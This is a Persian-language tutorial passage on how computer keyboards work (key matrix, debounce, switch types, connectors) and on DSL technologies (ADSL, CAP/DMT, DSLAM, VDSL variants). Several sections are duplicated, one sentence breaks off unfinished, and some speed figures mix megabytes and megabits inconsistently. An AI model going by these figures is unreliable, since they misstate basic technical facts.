کاراکترها  مقايسه و حرف A را توليد خواهد کرد.

شکل زير ريزپردازنده و کنترل کننده صفحه کليد را نشان می دهد.

شکل زير مدار ماتريسی کليد ها  را نشان می دهد.

صفحه کليد از سوئيچ  بمنظور اعمال  تغييردر جريان مربوط به مدارات صفحه کليد استفاده می نمايد.زمانيکه کليدی فشرده می گردد،  ميزان اندکی لرزش بين سطح تماس وجود داشته که bounce ناميده می گردد. پردازنده موجود در صفحه کليد آن را تشخيص داده و متوجه اين موضوع خواهد شد که فعال و غير فعال شدن سريع سوئيج بصورت تکراری ، نشاندهنده فشردن چندين کليد نبوده و صرفا" يک کليد در نظر گرفته خواهد شد.( تمام سيگنال های ديگر حذف و صرفا" يک سيگنال در نظر گرفته خواهد شد) . در صورتکيه کليدی را برای مدت زمانی نگه داری شده و اين عمل ادامه يابد پردازنده تشخيص خواهد داد که شما قصد داريد کليدهائی را بصورت تکراری برای کامپيوتر ارسال داريد عمليات فوق typematics ناميده می شود. در فرآيند فوق تاخير بين هر ضربه بر روی کليد می تواند توسط نرم افزار مشخص گردد. دامنه تاخير فوق از 2 کاراکتر در ثانيه شروع و می تواند تا 30 کاراکتر در ثانيه ادامه يابد .

تکنولوژی های صفحه کليد

صفحه کليدها از تکنولوژی های متفاوت سوئيچ، استفاده می نمايد. ما علاقه منديم زمانيکه کليدی  بر روی صفحه کليد فعال می گردد، واکنش آن را حس نمائيم ،.ما می خواهيم صدای "کليک " کليدها را در زمان تايپ بشنويم ، ما می خواهيم کليدها محکم ( سخت )  بوده و در زمان فشردن يک کليد  سريعا" کليد فشرده شده به حالت اوليه خود برگردد. در اين راستا از تکنولوژی های متفاوتی استفاده می گردد:

• § Rubber dome mechanical
• § Capacitive non-mechanical
• § Metal contact mechanical
• § Membrane mechanical
• § Foam element mechanical

متداولترين تکنولوژی سوئيچ استفاده شده در صفحه کليد rubber dome ( لاستيک برجسته) است . در اين نوع صفحه کليدها، هر کليد بر روی يک لاستيک برجسته  کوچک و انعطاف پذير به مرکزيت  يک کربن سخت  قرار می گيرد.زمانيکه کليدی فعال می گردد يک پيستون بر روی قسمت پائين کليد مجددا" لاستيک برجسته  را بسمت پايين بحرکت در می آورد. مسئله فوق باعث می گردد که کربن سخت ،  بسمت پايين حرکت  نمايد. ماداميکه کليد نگاه داشته شود کربن، مدار را برای آن بخش  ماتريس  تکميل می نمايد. زمانيکه کليد رها ( آزاد) می گردد، لاستيک برجسته مجددا" به شکل و حالت اوليه بر می گرداند.

سوئيچ های صفحه کليد های با تکنولوژی لاستيک برجسته ارزان و مقاوم در مقابل جهش و خورندگی می باشند چراکه لايه پلاستيکی ماتريس کليدها را در برمی گيرد. سوييچ های پرده ای در عمل شباهت زيادی با سوييچ های پلاستيکی دارند.کليدهای فوق دارای بخش مجزا برای هر کليد نبوده و در عوض از يک ورق پلاستيکی با برآمدگی های مربوطه به  هر کليد استفاده می نمايند. از اين نوع صفحه کليدها برای صنايع سنگين استفاده می گردند. ا از صفحه کليدهای فوق بندرت در کامپيوتر استفاده می گردد .

سوئيچ های Capacitive غير مکانيکی بوده چراکه در آنها مشابه ساير تکنولوژيهای مربوط به صفحه کليد از يک مدار کامل استفاده نمی گردد. در اينن سوئيچ ها جريان بصورت پيوسته در بين تمام بخش های ماتريس کليد وجود و حرکت می نمايد .

اتصالات صفحه کليد

زمانيکه کليدی توسط کاربر فعال می گردد پردازنده صفحه کليد بررسی لازم را انجام ( با توجه به مدار ماتريسی ) ونوع  حرفی را که می بايست برای کامپيوتر ارسال گردد،  مشخص می نمايد. کاراکترها در يک بافر و يا حافظه ای که معمولا" شانزده بايت ظرفيت دارد، قرار خواهند گرفت . در ادامه با توجه به نوع اتصالات مربوطه ، کاراکتر مورد نظر ارسال خواهد شد. . انواع متداول  کانکتورهای صفحه کليد عبارتند از :

• § کانکتور پنج پين DIN)Deustche industrie Norm)
• § کانکتور شش پين PS/2
• § کانکتور چهار پين USB
• § کانکتور داخلی ( برای کامپيوترهای Laptops ).

شکل زير يک کانکنور PS/2 را نشان می دهد.

کانکتورهای پنج پين از رايج ترين کانکتورهای صفحه کليد می باشند . برخی از کامپيوترها از کانکتور PS/2 استفاده می نمايند. امروزه در سيستم های جديد کانکتورهای PS/2 جای خود را به کانکتورهای USB داده  است . نوع کانکتوراستفاده شده دارای اهميت زيادی نبوده  و در اين راستا لازم است که به دو نکته اساسی دقت گردد . اولين موضوع برق مورد نياز صفحه کليد است . صفحه کليدها به ميزان اندکی برق ( حدودا" پنج ولت ) نياز دارند. کابل حمل کننده داده از صفحه کليد بسمت کامپيوتر قرار می گيرد.قسمت ديگر کابل صفحه کليد به پورتی متصل می گردد که مديريت آن توسط کنترل کننده صفحه کليد انجام می گيرد.کنترل کننده فوق يک مدار مجتمع بوده که مسئوليت آن پردازش تمام داده های ارسالی توسط صفحه کليد و هدايت آنها بسمت سيستم عامل است .زمانيکه سيستم عامل از وجود داده ارسالی توسط صفحه کليد آگاه  گردديد ، عمليات متفاوتی توسط سيستم عامل انجام خواهد شد.

-  آيا داده صفحه کليد يک دستور در سطح سيستم است؟ .( مثلا" فعال کردن کليدهای Ctrl-Alt-Delete).

- سيستم عامل در ادامه داده صفحه کليد را در اختيار برنامه جاری قرار خواهد داد.

- برنامه در حال اجراء ، قادر به شناسائی داده صفحه کليد بوده و آن را بعنوان يک دستور در سطح برنامه تلقی خواهد کرد.( مثلا" کليدهای Alt-f که در برنامه های مبتنی بر ويندوز باعث فعال شدن يک پنجره می گردد )

پس از شناخت و بررسی نوع داده ارسال شده توسط صفحه کليد ( دستور به سيستم عامل و يا دستور برای يک برنامه خاص ) پردازش های لازم با توجه به ماهيت داده انجام خواهد شد.

برای اتصال به اينترنت از روش های متفاوتی استفاده می گردد. استفاده از  مودم معمولی ،  مودم کابلی ،  شبکه محلی و يا خطوط DSL)Digital Subscriber Line)،  نمونه هائی از روش های موجود برای اتصال به اينترنت می باشند. DSL  ، يک اتصال با سرعت بالا را با استفاده از کابل های معمولی تلفن برای کاربران اينترنت فراهم می نمايد.

مزايای DSL

• § در زمان اتصال به اينترنت ، امکان استفاده از خط تلفن برای تماس های مورد نظر همچنان وجود خواهد داشت .
• § سرعت بمراتب بالاتر از مودم های معمولی است ( 1/5 مگابايت )
• § نياز به کابل کشی جديد نبوده و همچنان می توان از خطوط تلفن موجود استفاده کرد.
• § شرکت ارائه دهنده DSL ، مودم مورد نظر را در زمان نصب خط فوق در اختيار مشترک قرار خواهد داد.

اشکالات ( ايرادات ) DSL

• § يک اتصال DSL هر اندازه که به شرکت ارائه دهنده سرويس فوق نزديکتر باشد، دارای کيفيت بهتری است .
• § سرعت دريافت داده نسبت به ارسال داده بمراتب بيشتر است ( عدم وجود توا زن منطقی )
• § سرويس فوق در هر محل قابل دسترس نمی باشد.

مبانی DSL

در زمان نصب يک تلفن ( استاندارد)  در اغلب کشورها از يک زوج کابل مسی استفاده می شود. کابل مسی دارای پهنای بمراتب بيشتری نسبت به   آنچيزی است که  در مکالمات تلفنی استفاده می گردد ( بخش عمده ای ازظرفيت پهنای باند استفاده نمی گردد ) . DSL از پهنای باند بلااستفاده  بدون تاثير گذاری منفی بر کيفيت مکالمات صوتی ، استفاده می نمايد. ( تطبيق فرکانس های خاص بمنظور انجام عمليات خاص )

بمنظور شناخت نحوه عملکرد DSL ، لازم است در ابتدا با يک  خط تلفن معمولی آشنائی بيشتری پيدا گردد. اکثر خطوط تلفن و تجهيزات مربوطه دارای محدوديت فرکانسی در ارتباط با سوئيچ  ، تلفن  و ساير تجهيزاتی می باشند که بنوعی در فرآيند انتقال سيگنا ل ها دخالت دارند. صدای انسان ( در يک مکالمه صوتی معمولی ) توسط سيگنال هائی با فرکانس بين صفر تا 3400 قابل انتقال است . محدوده فوق بسيار ناچيز است . مثلا" در مقايسه با اغلب بلندگوهای استريو که دارای محدوده بين 20 تا 20.000 هرتز می باشند. کابل استفاده شده در سيستم تلفن قادر به انتقال سيگنال هائی با ظرفيت چندين ميليون هرتز می باشد. بدين ترتيب در مکالمات صوتی صرفا" از بخش بسيار محدودی از پهنای باند موجود، استفاده می گردد. با استفاده از پهنای باند استفاده نشده می توان علاوه بر بهره برداری از پتانسيل های  موجود،  بگونه ای عمل نمود که کيفيت مکالمات صوتی نيز دچار افت نگردند.  تجهيزات پيشرفته ای که اطلاعات را بصورت ديجيتال ارسال می نمايند ، قادر به استفاده از ظرفيت خطوط تلفن بصورت کامل می باشند. DSL چنين هدفی را دنبال می نمايد.

در اغلب منازل و ادارات برخی از کشورهای دنيا ، کاربران از يک DSL نامتقارن (ADSL) استفاده می نمايند. ADSL فرکانس های قابل دسترس دريک خط را تقسيم تا کاربران اينترنت قادر به دريافت و ارسال اطلاعات باشند. در مدل فوق ، فرض بر اين گذاشته شده است که سرعت دريافت اطلاعات بمراتب بيشتر از سرعت ارسال اطلاعات باشد. در صورتيکه سرعت خط اينترنت به کاربر ( دريافت اطلاعات ) ،  سه و يا چهار برابر سريعتر نسبت

صوت و داده

کيفيت دريافت و ارسال اطلاعات از طريق DSL ، به مسافت موجود بين استفاده کننده و شرکت ارائه دهنده سرويس فوق بستگی دارد. ADSL از يک تکنولوژی با نام " تکنولوژی حساس به مسافت " استفاده می نمايد. بموزات افزايش طول خط ارتباطی ، کيفيت سيگنال افت و سرعت خط ارتباطی کاهش پيدا می نمايد. ADSL دارای محدوديت 18.000 فوت ( 5.460 متر ) است . کاربرانی که در مجاورت و نزديکی شرکت ارائه دهنده سرويس DSL قرار دارند، دارای کيفيت و سرعت مناسبی بوده و بموازات افزايش مسافت ، کاربران اينترنت از نظر کيفيت و سرعت دچار افت خواهند شد.  تکنولوژی ADSL قادر به ارائه بالاترين سرعت در حالت " اينترنت به کاربر " (Downstream) تا 8 مگابيت در ثانيه است .( در چنين حالتی حداکثر مسافت 6.000 فوت و يا 1.820 متر خواهد بود ) . سرعت ارسال اطلاعات " از کاربر به اينترنت" (Upstream)  دارای محدوده 640 کيلوبيت در ثانيه خواهد بود. در عمل ،  بهترين سرعت ارائه شده برای ارسال اطلاعات از اينترنت به کاربر ، 1.5 مگابيت در ثانيه و سرعت ارسال ارسال اطلاعات توسط کاربر بر روی اينترنت ، 640 کيلوبيت در ثانيه است .

ممکن است اين سوال در ذهن خوانندگان مطرح گردد که اگر تکنولوژی DSL دارای محدوديت فاصله است ، چرا محدوديت فوق در رابطه  با مکالمات صوتی صدق نمی کند ؟ در پاسخ بايد به وجود يک تفويت کننده کوچک که Loading coils ناميده می شود ، اشاره کرد.شرکت های تلفن از تفويت کننده فوق،  بمنظور تقويت سيگنال صوتی استفاده می نمايند. متاسفانه تقويت کننده فوق با سيگنال های ADSL سازگار نيست . لازم به ذکر است که سيگنال های ADSL ، در صورتيکه بخشی از خط ارتباطی تلفن از فيبر نوری استفاده گردد ، قادر به ارسال و دريافت اطلاعات نخواهند بود.

تقسيم سيگنال

از دو استاندارد متفاوت برای تقسيم سيگنالها ( با يکديگر سازگار نمی باشند ) ،  استفاده می گردد. استاندارد ANSI، برای ADSL سيستمی با نام  Discrete Multitone است. (DMT). اکثر توليدکنندگان تجهيزات DSL از استاندارد فوق  تبعيت  می نمايند. استاندارد ديگری که نسبت به استاندارد DMT قديمی تر و بسادگی پياده سازی می گردد ، استاندارد Carrierless Amplitude/phase است (CAP) . استاندارد CAP ، سيگنال ها را به سه باند مجزا تقسيم می نمايد : مکالمات تلفن دارای باند صفر تا 4 کيلو هرتز، کانال دريافت اطلاعات از کاربر برای سرويس دهنده دارای باندی بين 25 تا 160 کيلو هرتز (Upstream) و کانال ارسال اطلاعات از سرويس دهنده برای کاربر ، دارای محدوده ای  که از240 کيلو هرتز شروع  می گردد.   حداکثر باند فوق به عوامل تفاوتی نظير :طول خط ، تعداد کاربران موجود در يک شرکت تلفنی خاص و ...بستگی دارد، بهرحال حداکثر محدوده باند فوق از 1.5 مگاهرتز تجاوز نخواهد کرد. سيستم CAP با استفاده از سه کانال فوق ، قادر به ارسال سيگنال های مربوطه خواهد بود.

استاندارد DMT ، نيز سيگنال های مربوطه را به کانال های مجزا تقسيم می نمايد.در استاندارد فوق از دو کانال مجزا برای ارسال و دريافت داده استفاده نمی گردد. DMT ، داده را به 247 کانال مجزا تقسيم می نمايد.هر کانال دارای باند 4 کيلو هرتز می باشند. ( وضعيت فوق مشابه آن است که شرکت تلفن مربوطه ، خط مسی موجود را به 247 خط 4 کيلو هرتزی مجزا تقسيم و هر يک از خطوط فوق را به يک مودم متصل نموده است . استفاده  همزمان از 247 مودم که هر يک دارای باند 4 کيلوهرتز می باشند). هر يک از کانال ها، کنترل و در صورتيکه کيفيت يک کانال افت نمايد ، سيگنال بر روی کانال ديگر شيفت پيدا خواهد کرد. فرآيند شيفت دادن سيگنا ل ها بين کانال های متفاوت و جستجو برای يافتن بهترين کانال ، بصورت پيوسته انجام خواهد شد. برخی از کانال ها بصورت دو طرفه استفاده می شوند ( ارسال و دريافت اطلاعات ) کنترل و مرتب سازی اطلاعات در کانال های دو طرفه و نگهداری کيفيت هر يک از 247 کانال موجود ، پياده سازی استاندارد DMT را نسبت به CAP بمراتب پيچيده تر نموده است . استاندارد DMT دارای انعطاف بمراتب بيشتری در رابطه با کيفيت خطوط و کانال ها ی مربوطه است .

استانداردهای CAP وDMT از ديد کاربر دارای يک شباهت می باشند. در هر دو حالت از يک فيلتر بمنظور فيلتر نمودن سيگنال های مربوطه استفاده می گردد. فيلترهای فوق از نوع Low-Pass می باشند. فيلترهای فوق  دارای ساختاری ساده بوده و تمام سيگنال های بالاتر از يک محدوده را بلاک خواهند کرد. مکالمات صوتی در محدوده پايين تر از 4 کيلو هرتز انجام می گيرند ، بنابراين فيلترهای فوق تمام سيگنا ل های بالاتر از محدوده فوق را بلاک خواهند کرد. بدين ترتيب از تداخل سيگنال های داده با مکالمات تلفنی جلوگيری بعمل می آيد.

تجهيزات DSL

ADSL از دو دستگاه خاص استفاده می نمايد. يکی از دستگاهها در محل مشترکين و دستگاه ديگر برای ISP ، شرکت تلفن و يا سازمانهای ارائه دهنده خدمات DSL ، نصب می گردد. در محل مشترکين از يک ترانسيور DSL استفاده می گردد. شرکت ارائه دهنده  خدمات DSL از يک DSL Access Multiplexer  استفاده می نمايد .(DSLAM) . از دستگاه فوق بمنظور دريافت اتصالات مشترکين استفاده می گردد. در ادامه به تشريح هر يک از دستگاههای فوق خواهيم پرداخت .

ترانسيور DSL

اکثر مشترکين DSL ، ترانسيور DSL را مودم DSL می نامند. مهندسين و کارشناسان شرکت های تلفن به دستگاه فوق ATU-R می گويند. صرفنظر از هر نامی که برای آن استفاده می شود ، دستگاه فوق نقطه برقراری ارتباط بين کامپيوتر کاربر و يا شبکه به خط DSL است . ترانسيور با استفاده از روش های متفاوت  به دستگاه مشترکين متصل می گردد. متداولترين روش،  استفاده از اتصالات USB و يا اترنت است .

DSLAM

دستگاه فوق در مراکز ارائه دهنده سرويس DSL نصب و امکان ارائه خدمات مبتنی بر DSL را فراهم می نمايد.  DSLAM اتصالات مربوط به تعدادی  از مشترکين را گرفته و آنها را به يک اتصال با ظرفيت بالا برای ارسال بر روی اينترنت تبديل می نمايد.  دستگاههای DSLAM دارای انعطاف لازم در خصوص استفاده از خطوط DSL  متفاوت ، پروتکل های متفاوت و مدولاسيون متفاوت (Cap,DMT)  می باشند. در برخی از مدل های فوق امکان انجام عمليات خاصی نظير اختصاص پويای آدرس های IP  به مشترکين،  نيز وجود دارد.

يکی از تفاوت های مهم بين  ADSL و مودم های کابلی ،  نحوه برخورد و رفتار DSLAM است . کاربران مودم های کابلی از يک شبکه بسته بصورت اشتراکی استفاده می نمايند. در چنين موارديکه همزمان با افزايش تعداد کاربران ، کارآئی آنها تنزل پيدا خواهد کرد. ADSL برای هر يک از کاربران يک ارتباط اختصاصی ايجاد و آن را به DSLAM متصل می نمايد. بدين ترتيب همزمان با افزايش کاربران ، کارآئی مربوطه تنزل پيدا نخواهد کرد. وضعيت فوق تا زمانيکه کاربران از تمام ظرفيت موجود خط ارتباطی با اينترنت استفاده نکرده باشند ، ادامه خواهد يافت . در صورت استفاده از تمام ظرفيت  خط ارتباطی اينترنت ، مراکز ارائه دهنده سرويس DSL می توانند نسبت به ارتقاء خط ارتباطی اينترنت اقدام تا تمام مشترکين متصل شده به DSLAM دارای کارآئی مطلوب در زمينه استفاده از اينترنت گردند.

آينده DSL

ADSL با ساير تکنولوژي های مربوط به دستيابی به اينترنت نظير مودم های کابلی و اينترنت ماهواره ای رقابت می نمايد. بر طبق آمار اخذ شده در سال 1999 ، بيش از 330.000  منزل در امريکا از DSL استفاده کرده اند. تعداد کاربران استفاده از مودم های کابلی تا سال 1999 به مرز 1.350.000 کاربر رسيده است . بر اساس پيش بينی بعمل آمده تا اواخر سال 2003 ، تعداد مشترکين مودم های کابلی به مرز 8.980.000 و مشترکين DSL به 9.300.000 خواهد رسيد.

سرعت ADSL در حال حاضر حداکثر 1.5 مگابيت در ثانيه است . از لحاظ تئوری رسيدن به مرز 7 مگابايت در ثانيه دور از دسترس نمی باشد. در اين زمينه  تحقيقات عمده ای صورت گرفته و تکنولوژی VDSL مطرح شده است .

استفاده از خطوط با سرعت بالا بمنظور دستيابی به اينترنت طی ساليان اخير بشدت رشد داشته است . مودم های کابلی و خطوط ADSL دو رويکرد متفاوت در اين زمينه می باشند. تکنولوژی های فوق امکان دستيابی کاربران را با سرعت مطلوب به اينترنت فراهم می نمايند. اينترنت بسرعت در حال رشد در تمامی ابعاد است . تلويزيون های ديجيتالی و پخش تصاوير ويدئويي دو کاربرد جديد در اينترنت بوده که علاقه مندان و مشتاقان زيادی را به خود جلب نموده است . بمنظور ارائه خدمات فوق و ساير خدمات مشابه ، کاربران و استفاده کنندگان اينترنت نيازمند استفاده از خطوط بمراتب سريعتر نسبت به وضعيت فعلی می باشند. مودم های کابلی و يا خطوط ADSL عليرغم ارائه سرعت مناسب در کاربردهائی که به آنها اشاره گرديد، فاقد سرعت لازم می باشند.

اخيرا" سازمانها و شرکت های متعددی تکنولوژی VDSL )Very high bit-rate DSL) را مطرح نموده اند. برخی از شرکت ها اقدام به ارائه سرويس فوق در برخی از نقاط کشورامريکا نموده اند. VDSL پهنای باند بسيار بالائی را ارائه و سرعت انتقال اطلاعات 52 مگابيت در ثانيه است . سرعت فوق در مقايسه با DSL ( حداکثر سرعت 8 تا ده مگابيت در ثانيه ) و يا مودم های کابلی بسيار بالا بوده و قطعا" نقطه عطفی در زمينه دستيابی به اينترنت از نظر سرعت خواهد بود. نقطه عطف قبلی، گذر از مرحله استفاده از مودم های با ظرفيت 56 کيلو بيت در ثانيه به broadband بود ( مودم های کابلی و خطوط DSL) .

مبانی DSL

در زمان نصب يک تلفن ( استاندارد) در اغلب کشورها از يک زوج کابل مسی استفاده می شود. کابل مسی دارای پهنای بمراتب بيشتری نسبت به آنچيزی است که در مکالمات تلفنی استفاده می گردد ( بخش عمده ای ازظرفيت پهنای باند استفاده نمی گردد ) . DSL از پهنای باند بلااستفاده بدون تاثير گذاری منفی بر کيفيت مکالمات صوتی ، استفاده می نمايد. ( تطبيق فرکانس های خاص بمنظور انجام عمليات خاص )

بمنظور شناخت نحوه عملکرد DSL ، لازم است در ابتدا با يک خط تلفن معمولی آشنائی بيشتری پيدا گردد. اکثر خطوط تلفن و تجهيزات مربوطه دارای محدوديت فرکانسی در ارتباط با سوئيچ ، تلفن و ساير تجهيزاتی می باشند که بنوعی در فرآيند انتقال سيگنا ل ها دخالت دارند. صدای انسان ( در يک مکالمه صوتی معمولی ) توسط سيگنال هائی با فرکانس بين صفر تا 3400 قابل انتقال است . محدوده فوق بسيار ناچيز است . مثلا" در مقايسه با اغلب بلندگوهای استريو که دارای محدوده بين 20 تا 20.000 هرتز می باشند. کابل استفاده شده در سيستم تلفن قادر به انتقال سيگنال هائی با ظرفيت چندين ميليون هرتز می باشد. بدين ترتيب در مکالمات صوتی صرفا" از بخش بسيار محدودی از پهنای باند موجود، استفاده می گردد. با استفاده از پهنای باند استفاده نشده می توان علاوه بر بهره برداری از پتانسيل های موجود، بگونه ای عمل نمود که کيفيت مکالمات صوتی نيز دچار افت نگردند. تجهيزات پيشرفته ای که اطلاعات را بصورت ديجيتال ارسال می نمايند ، قادر به استفاده از ظرفيت خطوط تلفن بصورت کامل می باشند. DSL چنين هدفی را دنبال می نمايد.

ADSL از دو دستگاه خاص استفاده می نمايد. يکی از دستگاهها در محل مشترکين و دستگاه ديگر برای ISP ، شرکت تلفن و يا سازمانهای ارائه دهنده خدمات DSL ، نصب می گردد. در محل مشترکين از يک ترانسيور DSL استفاده می گردد. شرکت ارائه دهنده خدمات DSL از يک DSL Access Multiplexer استفاده می نمايد .(DSLAM) . از دستگاه فوق بمنظور دريافت اتصالات مشترکين استفاده می گردد.

اکثر مشترکين DSL ، ترانسيور DSL را مودم DSL می نامند. مهندسين و کارشناسان شرکت های تلفن به دستگاه فوق ATU-R می گويند. صرفنظر از هر نامی که برای آن استفاده می شود ، دستگاه فوق نقطه برقراری ارتباط بين کامپيوتر کاربر و يا شبکه به خط DSL است . ترانسيور با استفاده از روش های متفاوت به دستگاه مشترکين متصل می گردد. متداولترين روش، استفاده از اتصالات USB و يا اترنت است .

دستگاه فوق در مراکز ارائه دهنده سرويس DSL نصب و امکان ارائه خدمات مبتنی بر DSL را فراهم می نمايد. DSLAM اتصالات مربوط به تعدادی از مشترکين را گرفته و آنها را به يک اتصال با ظرفيت بالا برای ارسال بر روی اينترنت تبديل می نمايد. دستگاههای DSLAM دارای انعطاف لازم در خصوص استفاده از خطوط DSL متفاوت ، پروتکل های متفاوت و مدولاسيون متفاوت (Cap,DMT) می باشند. در برخی از مدل های فوق امکان انجام عمليات خاصی نظير اختصاص پويای آدرس های IP به مشترکين، نيز وجود دارد.

يکی از تفاوت های مهم بين ADSL و مودم های کابلی ، نحوه برخورد و رفتار DSLAM است . کاربران مودم های کابلی از يک شبکه بسته بصورت اشتراکی استفاده می نمايند. در چنين موارديکه همزمان با افزايش تعداد کاربران ، کارآئی آنها تنزل پيدا خواهد کرد. ADSL برای هر يک از کاربران يک ارتباط اختصاصی ايجاد و آن را به DSLAM متصل می نمايد. بدين ترتيب همزمان با افزايش کاربران ، کارآئی مربوطه تنزل پيدا نخواهد کرد. وضعيت فوق تا زمانيکه کاربران از تمام ظرفيت موجود خط ارتباطی با اينترنت استفاده نکرده باشند ، ادامه خواهد يافت . در صورت استفاده از تمام ظرفيت خط ارتباطی اينترنت ، مراکز ارائه دهنده سرويس DSL می توانند نسبت به ارتقاء خط ارتباطی اينترنت اقدام تا تمام مشترکين متصل شده به DSLAM دارای کارآئی مطلوب در زمينه استفاده از اينترنت گردند.

سرعت VDSL

عملکرد VDSL ، در اغلب موارد مشابه ADSL است . عليرغم شباهت های موجود در اين زمينه اختلافات متعددی نيز وجود دارد. VDSL قادر به ارائه سرعت 52 مگابيت در ثانيه برای ارسال اطلاعات از اينترنت به کاربر (Downstream) و 16 مگابيت در ثانيه برای ارسال اطلاعات کاربر بر روی اينترنت (Upstream) است. سرعت های فوق بمراتب بيشتر از ADSL است . در ADSL حداکثر سرعت ارسال اطلاعات از اينترنت به کاربر ، 8 مگابيت در ثانيه و سرعت ارسال اطلاعات از کاربر به اينترنت 800 کيلوبيت در ثانيه است . VDSL سرعت بالای خود را مديون محدودتر شدن فاصله بين مشترکين و مرکز ارائه دهنده سرويس فوق است . حداکثر مسافت موجود 4.000 فوت ( 1.200 متر ) است .

شرکت های تلفن در حال جايگزين نمودن اغلب تجهيزات ( مربوط به تغذيه اطلاعات ) به فيبر نوری می باشند. اکثر شرکت های تلفن از تکنولوژی FTTC)Fiber to the curb) استفاده می نمايند. شرکت های فوق قصد دارند که تمام خطوط مسی موجود را تا محلی که از آنها انشعاب گرفته شده و به منازل مشترکين توزيع می گردد، تعويض نمايند. شرکت های تلفن در تلاش برای پياده سازی سيستم Fiber To the Neighborhood)FFTN) می باشند. در روش فوق در عوض نصب کابل فيبر نوری در هرخيابان ، FFTN دارای فيبر مورد نظر تا جعبه اتصالات ( انشعابات ) برای يک همسايه ( مشترک ) خاص است .

با ااستقرار يک ترانسيور VDSL در منزل و يک VDSL gateway در جعبه تقسيم اتصالات ، محدوديت فاصله کم رنگ خواهد شد. gateway باعث مراقبت از تبديلات آنالوگ به ديجيتال و ديجيتال به آنالوگ که باعث غيرفعال شدن ADSL بر روی خطوط فيبر نوری می گردد. Gateway داده های ورودی و دريافت شده از ترانسيور را به پالس های نور تبديل تا زمينه ارسال آنها از طريق فيبر نوری فراهم گردد. زمانيکه داده ها برای کامپيوتر کاربر ارسال می گردند( برگشت داده ) ، Gateway موجود سيگنال های ورودی از فيبر نوری را تبديل و آنها را برای ترانسيور کاربر ارسال می نمايد. فرآيند فوق در هر ثانيه ميليون ها مرتبه تکرار خواهد گرديد.

ADSL و VDSL صرفا" دو نمونه از تکنولوژط های مربوط به DSL spectrum می باشند . در ادامه به بررسی ساير مدل های مربوط به تکنولوژی فوق اشاره خواهد شد.

مقايسه انواع DSL

نمونه های متفاوتی از تکنولوژی DSL تاکنون پياده سازی شده است :

● Asymmetric DSL)ADSL) . .درمدل فوق بدليل تفاوت سرعت دريافت و ارسال اطلاعات از واژه " نامتقارن " استفاده شده است . ماهيت عمليات انجام شده توسط کاربران اينترنت بگونه ای است که همواره حجم اطلاعات دريافتی بمراتب بيشتر از اطلاعات ارسالی است .

● High bit-rate DSL)HDSL) . سرعت مدل فوق در حد خطوط T1 است ( 1/5 مگابيت در ثانيه ) .سرعت دريافت و ارسال اطلاعا ت در روش فوق يکسان بوده و بمنظور ارائه خدمات نياز به دو خط مجزا نسبت به خط تلفن معمولی موجود است .

● ISDN DSL)ISDL) . مدل فوق در ابتدا در اختيار کاربران استفاده کننده از ISDN قرار گرفت. ISDL در مقايسه با ساير مدل های DSL دارای پايين ترين سرعت است . سرعت اين خطوط 144 کيلوبيت در ثانيه است ( دو جهت ) .

●Multirate Symmetric DSL)MSDSL ) . در مدل فوق سرعت ارسال و دريافت اطلاعات يکسان است . نرخ سرعت انتقال اطلاعات توسط مرکز ارائه دهنده سرويس DSL ، تنظيم می گردد.

● Rate Adaptive)RADSL) . متداولترين مدل ADSL بوده و اين امکان را به مودم خواهد داد که سرعت برقراری ارتباط را با توجه به عواملی نظير مسافت و کيفيت خط تعيين نمايد.

● Symmetric DSL)SDLS ) . سرعت ارسال و دريافت اطلاعات يکسان است . در مدل فوق بر خلاف HDSL که از دو خط مجزا استفاده می نمايد ، صرفا" به يک خط نياز خواهد بود.

● Very high bit-rate)VDSL ) . مدل فوق بصورت "نامتقارن " بوده و در مسافت های کوتاه بهمراه خطوط مسی تلفن استفاده می گردد.

● Voice-over DSL)VoDSL) . يک نوع خاص از IP تلفنی است . در مدل فوق چندين خط تلفن ترکيب و به يک خط تلفن تبديل تبديل می شوند.

جدول زير نمونه های متفاوت تکنولوژی DSL را نشان می دهد .

استانداردهای VDSL

دو کنسرسيوم متفاوت در تلاش برای استاندارد نمودن VDSL می باشند. کنسرسيوم VDSL Alliance ، از يک سيستم Carrier با نام Discrete MultiTone)DMT) استفاده می نمايد. اکثر تجهيزات توليد شده ADSL از روش DMT استفاده می نمايند.

DMT ، سيگنال مربوطه را به 247 کانال مجزا تقسيم می نمايد.هر کانال دارای باند 4 کيلو هرتز می باشند. ( وضعيت فوق مشابه آن است که شرکت تلفن مربوطه ، خط مسی موجود را به 247 خط 4 کيلو هرتزی مجزا تقسيم و هر يک از خطوط فوق را به يک مودم متصل نموده است . استفاده همزمان از 247 مودم که هر يک دارای باند 4 کيلوهرتز می باشند.) هر يک از کانال ها کنترل و در صورتيکه کيفيت يک کانال افت نمايد ، سيگنال بر روی کانال ديگر شيفت پيدا خواهد کرد. فرآيند شيفت دادن سيگنا ل ها بين کانال های متفاوت و جستجو برای يافتن بهترين کانال ، بصورت پيوسته انجام خواهد شد. برخی از کانال ها بصورت دو طرفه استفاده می شوند ( ارسال و دريافت اطلاعات ) کنترل و مرتب سازی اطلاعات در کانال های دو طرفه و نگهداری کيفيت هر يک از 247 کانال موجود ، پياده سازی استاندارد DMT را نسبت به CAP بمراتب پيچيده تر نموده است . استاندارد DMT دارای انعطاف بمراتب بيشتری در رابطه با کيفيت خطوط و کانال های مربوطه است .

کنسرسيوم دوم ،VDSL Coalition نام دارد . در استاندارد ارائه شده توسط کنسرسيوم فوق از دو سيستم Carrier استفاده می گردد. Quadrature Amplitude Modulation)QAM) و Carrierless Amplitude Phase)CAP) دو نمونه سيستم Carrier ، می باشند.

استاندارد CAP ، سيگنال ها را به سه باند مجزا تقسيم می نمايد : مکالمات تلفن دارای باند صفر تا 4 کيلو هرتز ،. کانال دريافت اطلاعات از کاربر برای سرويس دهنده دارای باندی بين 25 تا 160 کيلو هرتز (Upstream) و کانال ارسال اطلاعات از سرويس دهنده برای کاربر ، دارای محدوده ای بوده که از 240 کيلو هرتز شروع می گردد. حداکثر باند فوق به عوامل تفاوتی نظير : طول خط ، تعداد کاربران موجود در يک شرکت تلفنی خاص و ...بستگی دارد، بهرحال حداکثر محدوده باند فوق ، از 1.5 مگاهرتز تجاوز نخواهد کرد. سيستم فوق (CAP) با استفاده از سه کانال فوق قادر به ارسال سيگنال های مربوطه خواهد بود.

